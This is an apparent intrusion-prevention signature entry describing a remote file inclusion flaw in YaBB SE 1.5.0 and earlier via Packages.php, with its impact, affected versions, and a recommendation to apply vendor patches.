YaBB.SE.Packages.php.Remote.File.Inclusion
Description
It indicates a possible exploit of PHP code inclusion vulnerability in YaBB software package.
YaBB (Yet Another Bulletin Board) is an open-source bulletin board system for any system. A vulnerability is reported in it that may allow an attacker to execute arbitrary PHP code on the vulnerable system. This is due to vulnerability in Packages.php script which has undefined variable $sourcedir. An remote attacker may send specially craft a URL request to Packages.php script directly that specifies the Packer.php script from a remote system as a parameter, which would allow the attacker to execute code on the vulnerable Web server.
Affected Products
YaBB SE 1.5 .0 and earlier versions.
Impact
Compromise of the affected system.
Recommended Actions
Apply vendor supplied patches.
Telemetry
Coverage
IPS (Regular DB) | |
IPS (Extended DB) |